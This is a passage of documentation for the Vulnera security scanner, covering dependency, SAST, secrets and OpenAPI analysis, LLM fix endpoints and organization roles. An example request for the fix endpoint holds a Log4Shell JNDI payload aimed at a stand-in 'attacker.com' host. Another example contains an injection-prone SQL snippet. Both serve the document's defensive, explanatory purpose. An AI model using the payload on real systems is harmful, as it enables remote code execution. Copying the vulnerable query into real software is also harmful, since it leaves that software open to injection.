| PHP (Composer) | composer.json, composer.lock |
| Ruby (Bundler) | Gemfile, Gemfile.lock |
| .NET (NuGet) | packages.config, *.csproj, *.props, *.targets |
Online Requirement
Dependency analysis requires a server connection to query vulnerability sources:
- OSV
- NVD
- GHSA
Running in offline mode skips dependency analysis.
Resolution Strategy
Vulnera uses a hybrid resolution approach:
- Lockfile-first — Extracts a fully resolved dependency tree from lockfiles for accurate transitive coverage.
- Manifest-only fallback — Best-effort resolution via registry metadata when lockfiles are absent.
Known gaps: Lockfile-independent transitive resolution is incomplete for some ecosystems (notably npm and PyPI).
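The hybrid strategy can be sketched as a simple preference order per manifest. The manifest-to-lockfile pairs below come from the ecosystems table above (simplified to one lockfile each); the real resolver is considerably more involved:

```python
# Lockfile-first resolution: prefer the fully resolved tree when available.
LOCKFILE_FOR = {
    "package.json": "package-lock.json",
    "Cargo.toml": "Cargo.lock",
    "go.mod": "go.sum",
    "composer.json": "composer.lock",
    "Gemfile": "Gemfile.lock",
}

def resolution_mode(project_files: set[str], manifest: str) -> str:
    """Return 'lockfile' when the manifest's lockfile is present,
    else fall back to best-effort registry resolution."""
    lockfile = LOCKFILE_FOR.get(manifest)
    return "lockfile" if lockfile in project_files else "manifest-fallback"

print(resolution_mode({"Cargo.toml", "Cargo.lock"}, "Cargo.toml"))   # lockfile
print(resolution_mode({"package.json"}, "package.json"))             # manifest-fallback
```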
Features
- Directed dependency graph with reachability analysis
- Concurrent vulnerability lookups with configurable limits
- Safe version recommendations with patch/minor/major impact classification
- CWE normalization and filtering
- Advisory intelligence via vulnera-advisor
Detail Levels
| Level | Best For | Includes |
|---|---|---|
| minimal | Status badges | Vulnerabilities list, basic metadata |
| standard | Inline decorations, quick fixes | Vulnerabilities, packages, version recommendations |
| full | Detailed reports, dependency trees | All data + dependency graph |
Output Example
{
  "package": "lodash",
  "current_version": "4.17.15",
  "vulnerability": "CVE-2021-23337",
  "recommendations": {
    "nearest_safe": "4.17.21",
    "latest_safe": "4.17.21",
    "upgrade_impact": "patch"
  }
}
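The upgrade_impact classification in this output follows semver position. A sketch, assuming plain MAJOR.MINOR.PATCH strings — real version handling must also cope with pre-releases and ecosystem-specific schemes:

```python
def upgrade_impact(current: str, target: str) -> str:
    """Classify a version jump as major/minor/patch by the first differing field."""
    cur = [int(part) for part in current.split(".")]
    tgt = [int(part) for part in target.split(".")]
    if tgt[0] != cur[0]:
        return "major"
    if tgt[1] != cur[1]:
        return "minor"
    return "patch"

print(upgrade_impact("4.17.15", "4.17.21"))  # 'patch', matching the lodash example
```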
CLI Usage
Dependency analysis runs via vulnera deps (online only):
# Basic scan
vulnera deps .
# Include transitive dependencies
vulnera deps . --include-transitive
# Force rescan (ignore local cache)
vulnera deps . --force-rescan
Next Steps
SAST Module (Static Application Security Testing)
The SAST module performs offline, multi-language static analysis using Tree-sitter parsing, optional OXC frontend for JS/TS, and inter-procedural taint analysis with call-graph support.
Overview
SAST analyzes source code to detect security flaws such as injection, insecure crypto, unsafe deserialization, and risky unsafe usage patterns. It emits findings in Vulnera’s unified schema and supports SARIF output.
Supported Languages
| Language | Parser | File Extensions |
|---|---|---|
| Python | tree-sitter-python | .py |
| JavaScript | tree-sitter-javascript / OXC | .js |
| TypeScript | tree-sitter-javascript / OXC | .ts |
| Rust | tree-sitter-rust | .rs |
| Go | tree-sitter-go | .go |
| C | tree-sitter-c | .c, .h |
| C++ | tree-sitter-cpp | .cpp, .cc, .hpp |
Note: JSX/TSX files are not scanned.
Pipeline (High-Level)
- Discovery — Walks files and maps them to supported languages.
- Parsing — Builds ASTs with Tree-sitter; optional OXC for JS/TS.
- Rule matching — Applies TOML rule packs to AST patterns.
- Taint analysis — Tracks source → sink flow across functions and files.
- Call graph — Resolves cross-file calls to expand reachability.
- Post-process — Dedupes, scores severity/confidence, emits findings.
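Steps 4–5 can be illustrated with a toy taint tracker that propagates taint through assignments and reports tainted values reaching a sink. The source/sink/sanitizer names are illustrative, and the real engine works on ASTs and call graphs, not statement triples:

```python
# Toy taint tracker: a drastic simplification of inter-procedural taint analysis.
SOURCES = {"request.args.get"}   # where untrusted data enters
SINKS = {"db.execute"}           # where tainted data is dangerous
SANITIZERS = {"escape"}          # calls that neutralize taint

def find_flows(statements):
    """statements: (target, called_function, args) triples in execution order."""
    tainted: set[str] = set()
    flows = []
    for target, func, args in statements:
        if func in SOURCES:
            tainted.add(target)                   # source output is tainted
        elif func in SANITIZERS:
            tainted.discard(args[0])              # sanitizer clears its input...
            if target:
                tainted.discard(target)           # ...and its result is clean
        elif func in SINKS:
            if any(a in tainted for a in args):
                flows.append((func, list(args)))  # tainted value reached a sink
        elif target and any(a in tainted for a in args):
            tainted.add(target)                   # taint propagates through assignment
    return flows

program = [
    ("user_id", "request.args.get", ["'id'"]),
    ("query", None, ["user_id"]),    # query = f"SELECT ... {user_id}"
    (None, "db.execute", ["query"]),
]
print(find_flows(program))  # [('db.execute', ['query'])]
```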
Rule System
SAST rules are TOML-based and embedded at build time. Optional Git-based rule packs can be configured.
Rule locations:
- vulnera-sast/rules/*.toml — core rule packs
- vulnera-sast/taint-patterns/*.toml — taint sources/sinks/sanitizers
- vulnera-sast/tests/fixtures/ — CVE fixtures for quality gates
Analysis Depth (SAST)
Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):
| Depth | Description |
|---|---|
| `quick` | Pattern matching only (no data-flow analysis) |
| `standard` | Patterns + intra-procedural data flow |
| `deep` | Full analysis (patterns + data flow + call graph + inter-procedural) |
Dynamic depth adjustment is enabled by default to keep large repos within time budgets.
CLI Usage (Actual Flags)
# Basic scan
vulnera sast .
# Severity filter
vulnera sast . --min-severity high
# Only changed files (git required)
vulnera sast . --changed-only
# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"
Available flags:
- `--min-severity <critical|high|medium|low>`
- `--fail-on-vuln`
- `--changed-only`
- `--files <path1,path2,...>`
- `--exclude <glob1,glob2,...>`
- `--languages <lang1,lang2,...>` (override auto-detection)
- `--rules <category1,category2,...>` (rule categories)
- `--no-cache` (disable incremental cache)
- `--watch` (continuous scanning)
- `--fix` (LLM-powered bulk fixes; requires online + auth + quota)
- `--baseline <path>` (baseline file for diff)
- `--save-baseline` (save current findings to baseline)
- `--only-new` (report only findings not in baseline)
Configuration
Configured via vulnera_core::config::SastConfig and AnalysisConfig.
Key settings:
analysis_depth = "quick|standard|deep"js_ts_frontend = "oxc_preferred" | "tree_sitter"enable_data_flow,enable_call_graphenable_ast_cache,ast_cache_ttl_hoursdynamic_depth_enabled, file/size thresholdsmin_finding_severity,min_finding_confidencerule_packsandrule_pack_allowlist
Example (TOML):
[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"
Output
Findings include:
- `severity` and `confidence`
- `location` (path + line/column)
- optional `snippet` and `semantic_path` (taint trace)
SARIF output:
vulnera sast . --format sarif > report.sarif
Quality Gates
Fixture-based accuracy thresholds are enforced in CI (from config/default.toml):
- Precision: ≥ 0.70
- Recall: ≥ 0.50
- Unique CWE coverage: ≥ 12
- Languages with fixtures: ≥ 7
Limitations
- Tree-sitter is syntax-level; no macro expansion or full type resolution.
- Runtime behavior and dynamic code generation are out of scope.
- JSX/TSX files are excluded.
Next Steps
SAST (Static Application Security Testing)
Vulnera SAST detects security issues in source code using Tree-sitter parsing, a call-graph builder, and inter-procedural taint analysis. It is fully offline and runs locally.
What It Detects
Common categories include:
- SQL injection and command injection
- XSS and HTML injection
- Unsafe deserialization and dynamic code execution
- Insecure crypto and weak randomness
- Path traversal and file disclosure
- Risky `unsafe` usage patterns (Rust)
How It Works
Pipeline overview:
- Discovery — Walks the project and maps files to supported languages.
- Parsing — Builds syntax trees using Tree-sitter (with OXC for JS/TS when enabled).
- Rule matching — Applies TOML rule packs to AST patterns.
- Taint analysis — Tracks source → sink flow, intra- and inter-procedural.
- Call graph — Resolves function calls across files to expand taint reachability.
- Post-process — Dedupes, scores confidence/severity, emits unified findings.
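The taint-analysis step above can be illustrated with a toy intra-procedural tracker. This is a sketch with hypothetical source/sink names, not Vulnera's engine:

```python
# Toy intra-procedural taint tracking over a linear sequence of statements.
# Source/sink names are hypothetical, chosen for illustration only.
TAINT_SOURCES = {"request.args.get", "input"}
TAINT_SINKS = {"db.execute", "os.system"}

def find_taint_flows(statements):
    """statements: list of (lhs_var, call_name, arg_vars) tuples."""
    tainted = set()
    flows = []
    for lhs, call, args in statements:
        if call in TAINT_SOURCES:
            tainted.add(lhs)                  # value originates at a source
        elif any(a in tainted for a in args):
            if call in TAINT_SINKS:
                flows.append((call, args))    # tainted value reaches a sink
            elif lhs:
                tainted.add(lhs)              # taint propagates via assignment
    return flows

stmts = [
    ("user", "request.args.get", []),
    ("query", "format", ["user"]),
    (None, "db.execute", ["query"]),
]
print(find_taint_flows(stmts))  # [('db.execute', ['query'])]
```

The real engine does this over ASTs and across function boundaries (using the call graph in `deep` mode), but the source-to-sink propagation idea is the same.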
Supported Languages
| Language | Parser | File Extensions |
|---|---|---|
| Python | tree-sitter-python | .py |
| JavaScript | tree-sitter-javascript / OXC | .js |
| TypeScript | tree-sitter-javascript / OXC | .ts |
| Rust | tree-sitter-rust | .rs |
| Go | tree-sitter-go | .go |
| C | tree-sitter-c | .c, .h |
| C++ | tree-sitter-cpp | .cpp, .cc, .hpp |
Note: JSX/TSX files are not scanned.
Analysis Depth (SAST)
Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):
| Depth | Description |
|---|---|
| `quick` | Pattern matching only (no data-flow analysis) |
| `standard` | Patterns + intra-procedural data flow |
| `deep` | Full analysis (patterns + data flow + call graph + inter-procedural) |
Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable with VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.
Rule System
Rules are TOML-based and embedded at build time. You can optionally load Git-based rule packs.
Locations:
- `vulnera-sast/rules/*.toml` — core rule packs
- `vulnera-sast/taint-patterns/*.toml` — taint sources/sinks/sanitizers
- `vulnera-sast/tests/fixtures/` — CVE fixtures for quality gates
CLI Usage (Actual Flags)
SAST runs via vulnera sast:
# Basic scan
vulnera sast .
# Severity filter
vulnera sast . --min-severity high
# Only changed files (git required)
vulnera sast . --changed-only
# Explicit file list
vulnera sast . --files src/main.rs,src/lib.rs
# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"
Available flags:
- `--min-severity <critical|high|medium|low>`
- `--fail-on-vuln`
- `--changed-only`
- `--files <path1,path2,...>`
- `--exclude <glob1,glob2,...>`
- `--languages <lang1,lang2,...>` (override auto-detection)
- `--rules <category1,category2,...>` (rule categories)
- `--no-cache` (disable incremental cache)
- `--watch` (continuous scanning)
- `--fix` (LLM-powered bulk fixes; requires online + auth + quota)
- `--baseline <path>` (baseline file for diff)
- `--save-baseline` (save current findings to baseline)
- `--only-new` (report only findings not in baseline)
Output
SAST findings are emitted in the unified finding schema:
- `severity` and `confidence`
- `location` (path + line/column)
- optional `snippet` and `semantic_path` (taint trace)
You can emit SARIF:
vulnera sast . --format sarif > report.sarif
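Because SARIF is plain JSON, the report is easy to post-process in CI. A minimal sketch that counts results per rule (field names follow the SARIF 2.1.0 schema; the inline sample stands in for `report.sarif`):

```python
import json
from collections import Counter

# Minimal sketch: count SARIF results per rule ID. Field names follow the
# SARIF 2.1.0 schema; the inline sample document stands in for report.sarif.
sample = json.loads("""{
  "version": "2.1.0",
  "runs": [{"results": [
    {"ruleId": "sql-injection", "level": "error"},
    {"ruleId": "sql-injection", "level": "error"},
    {"ruleId": "weak-hash", "level": "warning"}
  ]}]
}""")

counts = Counter(
    result["ruleId"]
    for run in sample["runs"]
    for result in run["results"]
)
print(counts.most_common())  # [('sql-injection', 2), ('weak-hash', 1)]
```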
Configuration (Server + Library)
The SAST engine is configured via vulnera_core::config::SastConfig and AnalysisConfig.
Key settings:
- `analysis_depth = "quick|standard|deep"`
- `js_ts_frontend = "oxc_preferred" | "tree_sitter"`
- `enable_data_flow`, `enable_call_graph`
- `enable_ast_cache`, `ast_cache_ttl_hours`
- `dynamic_depth_enabled`, file/size thresholds
- `min_finding_severity`, `min_finding_confidence`
- `rule_packs` and `rule_pack_allowlist`
Example (TOML):
[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"
Offline Guarantees
SAST runs fully offline:
- No network calls
- All rule packs embedded unless you configure external rule packs
Quality Gates
The SAST module ships with a fixture-based accuracy harness enforced in CI.
Thresholds (from config/default.toml):
- Precision: ≥ 0.70
- Recall: ≥ 0.50
- Unique CWE coverage: ≥ 12
- Languages with fixtures: ≥ 7
Limitations
- Tree-sitter is syntax-level; no macro expansion or full type resolution.
- Dynamic code generation and runtime behavior are out of scope.
- JSX/TSX files are excluded.
Next Steps
Secrets Detection Module
The Secrets Detection module finds hardcoded credentials and sensitive tokens in source code using regex-based rules and entropy heuristics. It runs fully offline by default, with optional online verification for select providers.
Detection Methods
| Method | Description | Offline |
|---|---|---|
| Regex rules | Known secret patterns with context keywords | ✅ Yes |
| Entropy | High-entropy token detection (Base64/hex/generic) | ✅ Yes |
| Verification | Optional provider checks (AWS/GitHub/GitLab) | ❌ No |
Supported Secret Types
Examples include:
- Cloud credentials (AWS, Azure, GCP)
- API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
- OAuth/JWT/Bearer tokens
- Database connection strings and passwords
- Private keys (RSA/EC/PGP/SSH)
- High-entropy strings (Base64/hex/generic tokens)
How It Works
- Discovery — Walks files within the scan root.
- Regex rules — Applies built-in secret patterns.
- Entropy detection — Flags high-entropy strings using thresholds.
- Optional verification — Provider-specific checks (disabled by default).
- Post-process — Dedupes and emits unified findings.
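The entropy step scores candidate strings with Shannon entropy (bits per character); tokens above a threshold are flagged. A minimal sketch, where the 4.5 default mirrors the `base64_entropy_threshold` in the configuration example below:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of the string."""
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_high_entropy(token: str, threshold: float = 4.5) -> bool:
    """Flag candidates whose per-character entropy exceeds the threshold
    (4.5 mirrors the base64 default in the configuration example)."""
    return shannon_entropy(token) > threshold

print(looks_high_entropy("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"))  # True
print(looks_high_entropy("administrator"))                     # False
```

English words sit well below the threshold, while random-looking tokens exceed it; this is also why entropy-only detection is noisier than regex rules and is gated behind `--include-entropy` on the CLI.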
CLI Usage (Actual Flags)
Secrets detection runs via vulnera secrets:
# Basic scan
vulnera secrets .
# Only changed files (git required)
vulnera secrets . --changed-only
# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs
# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"
# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy
Available flags:
- `--fail-on-secret`
- `--changed-only`
- `--files <path1,path2,...>`
- `--exclude <glob1,glob2,...>`
- `--include-tests`
- `--include-entropy`
- `--no-cache`
- `--watch`
Output
Secrets findings follow the unified finding schema:
- `secret_metadata` is populated
- `vulnerability_metadata` may be empty
- `enrichment` is optional (LLM)
You can emit SARIF:
vulnera secrets . --format sarif > report.sarif
Configuration (Server + Library)
Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.
Key settings:
- `enable_entropy_detection`
- `base64_entropy_threshold`, `hex_entropy_threshold`
- `exclude_patterns`, `exclude_extensions`
- `baseline_file_path`, `update_baseline`
- `scan_git_history`, `max_commits_to_scan`
- `enable_verification` (default: false)
Example (TOML):
[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false
Offline Guarantees
Secrets detection runs fully offline by default:
- No network calls
- Regex rules and entropy heuristics are local
- Verification is opt-in and requires network access
Limitations
- Entropy detection can surface false positives in test fixtures and generated tokens.
- Markdown and certain doc extensions are excluded by default unless explicitly included.
- Verification is limited to supported providers.
Next Steps
Secrets Detection
Vulnera Secrets detects hardcoded credentials and sensitive tokens using regex-based rules and entropy heuristics. It runs fully offline by default, with optional provider verification.
What It Detects
Common categories include:
- Cloud credentials (AWS, Azure, GCP)
- API keys and tokens (Stripe, Twilio, GitHub, GitLab, generic API keys)
- OAuth/JWT/Bearer tokens
- Database connection strings and passwords
- Private keys (RSA/EC/PGP/SSH)
- High-entropy strings (Base64/hex/generic tokens)
How It Works
Pipeline overview:
- Discovery — Walks files within the scan root.
- Regex rules — Applies built-in secret patterns (rule pack).
- Entropy detection — Flags high-entropy strings (Base64/hex + generic heuristics).
- Optional verification — Provider-specific verification (disabled by default).
- Post-process — Dedupes and emits unified findings.
Detection Methods
| Method | Description | Offline |
|---|---|---|
| Regex rules | Known secret patterns with context keywords | ✅ Yes |
| Entropy | High-entropy token detection (Base64/hex/generic) | ✅ Yes |
| Verification | Optional provider checks (AWS/GitHub/GitLab) | ❌ No |
CLI Usage (Actual Flags)
Secrets detection runs via vulnera secrets:
# Basic scan
vulnera secrets .
# Only changed files (git required)
vulnera secrets . --changed-only
# Specific files
vulnera secrets . --files src/config.rs,src/lib.rs
# Exclude paths (glob patterns)
vulnera secrets . --exclude "tests/*,vendor/*"
# Include entropy-based detections (more noise)
vulnera secrets . --include-entropy
Available flags:
- `--fail-on-secret`
- `--changed-only`
- `--files <path1,path2,...>`
- `--exclude <glob1,glob2,...>`
- `--include-tests`
- `--include-entropy`
- `--no-cache`
- `--watch`
Output
Secrets findings follow the unified finding schema. For secret findings:
- `secret_metadata` is populated
- `vulnerability_metadata` may be empty
- `enrichment` is optional (LLM)
You can emit SARIF:
vulnera secrets . --format sarif > report.sarif
Configuration (Server + Library)
Secrets detection is configured via vulnera_core::config::SecretDetectionConfig.
Key settings:
- `enable_entropy_detection`
- `base64_entropy_threshold`, `hex_entropy_threshold`
- `exclude_patterns`, `exclude_extensions`
- `baseline_file_path`, `update_baseline`
- `scan_git_history`, `max_commits_to_scan`
- `enable_verification` (default: false)
Example (TOML):
[secret_detection]
enable_entropy_detection = true
base64_entropy_threshold = 4.5
hex_entropy_threshold = 3.0
exclude_patterns = ["node_modules", ".git", "target"]
exclude_extensions = ["md", "markdown", "rst", "html"]
scan_git_history = false
enable_verification = false
Offline Guarantees
Secrets detection runs fully offline by default:
- No network calls
- Regex rules and entropy heuristics are local
- Verification is opt-in and requires network access
Limitations
- Entropy detection can surface false positives in test fixtures and generated tokens.
- Markdown and certain doc extensions are excluded by default unless explicitly included.
- Verification is limited to supported providers.
Next Steps
API Security
The API Security module analyzes OpenAPI 3.x specifications to identify security vulnerabilities and design misconfigurations before deployment. It runs fully offline and is triggered when an OpenAPI spec is detected (or explicitly provided).
Supported Specifications
- OpenAPI 3.0
- OpenAPI 3.1
Analyzer Categories (Actual)
These analyzers run on the parsed OpenAPI spec:
- Authentication — missing auth, weak schemes (e.g., basic), insecure auth usage
- Authorization — missing authorization checks, overly permissive access
- Input Validation — missing request validation, unsafe parameter shapes
- Data Exposure — sensitive data in URLs/headers, response overexposure
- Security Headers — missing CSP/HSTS/XFO/XCTO; CORS review
- OAuth/OIDC — insecure flows, redirect issues, token validation gaps
- Design — versioning and error-handling issues
- Security Misconfiguration — insecure defaults and configuration pitfalls
- Resource Restriction — missing request size/limit constraints
Notable Checks
- CORS wildcard detection: `Access-Control-Allow-Origin: *` is flagged as high severity.
- Missing security headers: required headers are validated per response.
- Missing authentication: endpoints with no security requirements are flagged.
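A simplified sketch of the missing-authentication and wildcard-CORS checks over a parsed spec. Plain dicts stand in here; the real analyzers work on a parsed OpenAPI model, and the exact header-lookup shape is an assumption for illustration:

```python
# Simplified sketch of two API Security checks over a parsed OpenAPI document
# represented as plain dicts (the real analyzers use a typed model).
def check_spec(spec: dict) -> list[str]:
    findings = []
    for path, ops in spec.get("paths", {}).items():
        for method, op in ops.items():
            # Missing authentication: no operation- or spec-level security.
            if not op.get("security") and not spec.get("security"):
                findings.append(f"missing_authentication: {method.upper()} {path}")
            # CORS wildcard documented in a response header example.
            for resp in op.get("responses", {}).values():
                acao = resp.get("headers", {}).get("Access-Control-Allow-Origin", {})
                if acao.get("schema", {}).get("example") == "*":
                    findings.append(f"insecure_cors: {method.upper()} {path}")
    return findings

spec = {
    "paths": {
        "/users": {
            "get": {
                "responses": {
                    "200": {
                        "headers": {
                            "Access-Control-Allow-Origin": {"schema": {"example": "*"}}
                        }
                    }
                }
            }
        }
    }
}
print(check_spec(spec))  # ['missing_authentication: GET /users', 'insecure_cors: GET /users']
```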
Configuration
The module is configured via vulnera_core::config::ApiSecurityConfig.
Key settings
- `enabled_analyzers`: list of analyzers to run (empty = all)
- `severity_overrides`: map of vulnerability type → severity
- `exclude_paths`: skip specific API paths
- `strict_mode`: more aggressive checks
Example (TOML)
[api_security]
enabled_analyzers = ["authentication", "authorization", "input_validation", "security_headers"]
exclude_paths = ["/health", "/metrics"]
strict_mode = true
[api_security.severity_overrides]
"missing_authentication" = "high"
"insecure_cors" = "high"
CLI Usage
Analyze a spec directly using the CLI:
# Auto-detect spec in a directory
vulnera api .
# Analyze an explicit spec file
vulnera api . --spec ./openapi.yaml
Relevant flags:
- `--spec <path>` — explicit OpenAPI spec path
- `--min-severity <critical|high|medium|low>`
- `--fail-on-issue`
- `--framework <name>` (optional)
Output
Findings are emitted in the unified finding schema with:
- `severity` and `confidence`
- `location` (path + operation)
- `description` and `recommendation`
SARIF output is supported:
vulnera api . --format sarif > report.sarif
Limitations
- Relies on the spec as the source of truth — runtime behavior is out of scope.
- Missing or incomplete specs will limit detection.
Next Steps
LLM Features (Explanations, Fixes, Queries)
Vulnera’s LLM features are post-processing only. Detection is performed by SAST, Secrets, API Security, and Dependency Analysis modules; LLMs are used to explain findings and propose fixes after the scan. LLM calls require network access and valid provider credentials.
What’s Available
1) Explain a Vulnerability (API)
Endpoint:
POST /api/v1/llm/explain
Request (example):
{
  "vulnerability_id": "CVE-2021-44228",
  "description": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP endpoints.",
  "affected_component": "org.apache.logging.log4j:log4j-core",
  "audience": "technical"
}
Response (example):
{
  "explanation": "This vulnerability allows remote code execution because ...",
  "key_points": ["Remote Code Execution", "JNDI Injection", "Critical Severity"],
  "mitigation_steps": ["Upgrade to version 2.15.0", "Disable JNDI lookup"]
}
2) Generate a Code Fix (API)
Endpoint:
POST /api/v1/llm/fix
Request (example):
{
  "vulnerability_id": "CVE-2021-44228",
  "vulnerable_code": "logger.error(\"${jndi:ldap://attacker.com/a}\");",
  "language": "java",
  "context": "src/main/java/com/example/App.java"
}
Response (example):
{
  "fixed_code": "logger.error(\"User input: {}\", sanitizedInput);",
  "explanation": "Replaced direct string concatenation with parameterized logging.",
  "confidence": 0.95
}
3) Natural Language Query (API)
Endpoint:
POST /api/v1/llm/query
Request (example):
{
  "query": "How do I fix the SQL injection in login.php?",
  "context": { "file": "login.php", "content": "..." }
}
Response (example):
{
  "answer": "Use prepared statements and parameterized queries...",
  "references": ["https://owasp.org/www-community/attacks/SQL_Injection"]
}
4) Enrich Job Findings (API)
Endpoint:
POST /api/v1/jobs/{job_id}/enrich
Request (example):
{
  "finding_ids": ["finding_123", "finding_456"],
  "code_contexts": {
    "finding_123": "def login(user, password):\n    query = f\"SELECT * FROM users WHERE user='{user}'\""
  }
}
Response (example):
{
  "job_id": "550e8400-e29b-41d4-a716-446655440000",
  "enriched_count": 5,
  "failed_count": 1,
  "findings": [
    {
      "id": "finding_123",
      "severity": "Critical",
      "description": "SQL Injection...",
      "location": "src/auth.py:42:10",
      "explanation": "...",
      "remediation_suggestion": "Use parameterized queries..."
    }
  ]
}
CLI Support
Generate a Fix (CLI)
Command:
vulnera generate-fix
Usage:
vulnera generate-fix \
--vulnerability CVE-2021-44228 \
--code src/main/java/com/example/App.java \
--line 42
Notes:
- Requires online mode, authentication, and available quota.
- If offline, unauthenticated, or quota exceeded, the command exits with an error code.
Bulk SAST Fix Suggestions (CLI)
Command:
vulnera sast --fix
Usage:
vulnera sast . --fix
Notes:
- Runs SAST locally, then uses the server for LLM-powered fix suggestions.
- Requires online mode and authentication.
Provider Configuration
LLM providers are configured via vulnera_core::config::LlmConfig and environment variables.
Provider Selection
- `VULNERA__LLM__PROVIDER=google_ai|openai|azure`
- `VULNERA__LLM__DEFAULT_MODEL`
- `VULNERA__LLM__TEMPERATURE`
- `VULNERA__LLM__MAX_TOKENS`
- `VULNERA__LLM__TIMEOUT_SECONDS`
- `VULNERA__LLM__ENABLE_STREAMING`
Google AI (Gemini)
- `GOOGLE_AI_KEY`
- `VULNERA__LLM__GOOGLE_AI__BASE_URL`
OpenAI
- `OPENAI_API_KEY`
- `VULNERA__LLM__OPENAI__BASE_URL`
- `VULNERA__LLM__OPENAI__ORGANIZATION_ID`
Azure OpenAI
- `AZURE_OPENAI_KEY`
- `VULNERA__LLM__AZURE__ENDPOINT`
- `VULNERA__LLM__AZURE__DEPLOYMENT`
- `VULNERA__LLM__AZURE__API_VERSION`
Quota and Cost
LLM operations are higher-cost than standard analysis:
- Analysis: 3 tokens
- LLM (explain/fix/query): 6 tokens
Use LLM sparingly for high-severity findings, and prefer batch enrichment for efficiency.
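Given those rates, the token cost of a planned batch can be estimated up front. A small sketch using the per-operation costs listed above:

```python
# Estimate token cost for a planned workload, using the rates listed above:
# standard analysis = 3 tokens, LLM operation (explain/fix/query) = 6 tokens.
ANALYSIS_COST = 3
LLM_COST = 6

def estimate_cost(analyses: int, llm_ops: int) -> int:
    return analyses * ANALYSIS_COST + llm_ops * LLM_COST

# Example: 10 scans plus LLM enrichment of the 4 critical findings.
print(estimate_cost(analyses=10, llm_ops=4))  # 54
```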
Troubleshooting
LLM requests fail in offline mode
LLM requires network access. Remove `--offline` and ensure the server is reachable.
Authentication required
Run `vulnera auth login` or set `VULNERA_API_KEY`.
Quota exceeded
Check `vulnera quota` and reduce LLM usage or wait for reset.
Next Steps
Web Dashboard (API-First Guidance)
Vulnera is API-first and does not ship a bundled web UI in this repository. If you need a dashboard, use the API endpoints below to build your own UI or integrate with existing tools.
Core API Endpoints
Health & Docs
- `GET /health` — service health
- `GET /metrics` — metrics endpoint
- `GET /docs` — Swagger UI (if enabled)
- `GET /api-docs/openapi.json` — OpenAPI spec
Jobs & Analysis
- `POST /api/v1/analyze/job` — create analysis job
- `GET /api/v1/jobs/{id}` — get job status/result
Organizations
- `POST /api/v1/organizations` — create organization
- `GET /api/v1/organizations` — list organizations
- `GET /api/v1/organizations/{id}` — organization details
- `PUT /api/v1/organizations/{id}` — update organization
- `DELETE /api/v1/organizations/{id}` — delete organization
- `GET /api/v1/organizations/{id}/members` — list members
- `POST /api/v1/organizations/{id}/members` — invite member
- `DELETE /api/v1/organizations/{id}/members/{user_id}` — remove member
- `POST /api/v1/organizations/{id}/leave` — leave organization
- `POST /api/v1/organizations/{id}/transfer` — transfer ownership
Analytics & Quota
- `GET /api/v1/organizations/{id}/analytics/dashboard` — org dashboard stats
- `GET /api/v1/organizations/{id}/analytics/usage` — org usage
- `GET /api/v1/organizations/{id}/analytics/quota` — org quota
- `GET /api/v1/me/analytics/dashboard` — personal dashboard stats
- `GET /api/v1/me/analytics/usage` — personal usage
- `GET /api/v1/quota` — quota usage
LLM Features (Optional)
- `POST /api/v1/llm/explain`
- `POST /api/v1/llm/fix`
- `POST /api/v1/llm/query`
- `POST /api/v1/jobs/{job_id}/enrich`
Authentication & Security
- Cookie auth uses JWT + CSRF.
- API key auth uses the `X-API-Key` header.
- CORS must be configured for your UI origin.
- Swagger UI can be disabled in production via config.
Building Your Own Dashboard
A minimal dashboard typically includes:
- Organization selector
- Recent jobs list (`/organizations/{id}/analytics/dashboard`)
- Findings view (from job detail: `/jobs/{id}`)
- Quota widget (`/organizations/{id}/analytics/quota` or `/api/v1/quota`)
- Usage charts (`/organizations/{id}/analytics/usage`)
Configuration Reference
See:
Next Steps
Organization Management Guide
Organizations in Vulnera enable team collaboration with shared quotas, centralized reporting, and role-based access control. This guide covers everything you need to manage your organization effectively.
Creating an Organization
Step-by-Step Setup
1. Navigate to Organization Creation
   - Click + New Organization in the sidebar
   - Or go to Dashboard → Organizations → Create New
2. Fill in Organization Details
   - Organization Name — Your company or team name (e.g., “Acme Security Team”)
   - Description — Brief description of the organization’s purpose
   - Logo — Optional: Upload organization logo (PNG, JPG, 512×512px recommended)
   - Contact Email — Primary contact for billing and notifications
3. Select Plan Tier
   - Free — 48 tokens/month, up to 5 members, basic integrations
   - Pro — 1000 tokens/month, unlimited members, advanced integrations
   - Enterprise — Custom tokens, SSO/SAML, custom domains, priority support
4. Confirm Creation
   - Review settings
   - Click Create Organization
   - You’re automatically made Owner and Organization Admin
Post-Creation Setup Checklist
- Upload organization logo
- Add organization description
- Set up billing (if on paid plan)
- Invite team members
- Generate API key
- Configure integrations
- Set notification preferences
Organization Roles & Permissions
Role Hierarchy
Owner
↓ (can delegate to)
Admin
↓ (can delegate to)
Member
Viewer (read-only)
Detailed Permissions Matrix
| Permission | Owner | Admin | Member | Viewer |
|---|---|---|---|---|
| Scans | | | | |
| Create scans | ✅ | ✅ | ✅ | ❌ |
| View scans | ✅ | ✅ | ✅ | ✅ |
| Delete scans | ✅ | ✅ | ❌ | ❌ |
| Export scan results | ✅ | ✅ | ✅ | ✅ |
| Findings | | | | |
| View findings | ✅ | ✅ | ✅ | ✅ |
